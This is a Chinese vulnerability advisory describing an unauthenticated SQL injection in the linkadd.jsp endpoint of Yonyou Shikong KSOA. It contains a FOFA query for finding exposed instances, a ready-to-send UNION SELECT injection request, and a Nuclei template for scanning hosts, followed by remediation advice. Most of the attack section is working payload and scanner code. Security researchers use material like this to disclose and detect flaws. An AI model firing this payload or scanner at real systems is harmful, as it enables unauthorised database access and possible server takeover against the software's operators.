登录 白背景

用友时空KSOA linkadd存在SQL注入漏洞

一、漏洞简介

0x01 产品简介


用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。


1711337402553-5b9cebf5-a633-4eb3-9849-1ae6b7dbd71d.png

0x02 漏洞概述


用友时空KSOA linkadd接口处存在 SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。


0x03 网络测绘

app="用友-时空KSOA"

0x04 漏洞复现

使用md5加密数据

1714988277161-7a0b5b2b-8892-4a5d-bd3f-c960ecbf0d13.png

GET /linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456987%27%29%29%2Cnull%2Cnull%2C%27 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

0x05 Nuclei

id: yonyou-KSOA-linkadd-SQL

info:
  name: 用友时空KSOA-SQL-linkadd
  author: WLF
  severity: high
  metadata:
    fofa-query: app="用友-时空KSOA"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        GET /linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456987%27%29%29%2Cnull%2Cnull%2C%27 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"35092b43f6daab6e117b2429f5e623")

0x06 修复建议


采用参数化查询或预编译语句等安全的数据库访问方法,确保用户输入的数据不直接与SQL查询语句拼接,从而防止恶意SQL代码的注入。对所有用户输入进行严格的验证和过滤,包括对数据类型、长度、格式等的验证,以确保输入数据符合预期的格式和范围。采用最小权限原则,为数据库用户分配最小必要的权限,避免在SQL查询中暴露敏感信息。对数据库服务器和应用程序进行定期更新和维护,及时应用安全补丁,以修复已知的漏洞。进行安全审计和监控,记录数据库访问日志,并监测异常行为,及时发现和响应潜在的攻击。

原文: https://www.yuque.com/xiaokp7/ocvun2/ondf9zdhq30yxusc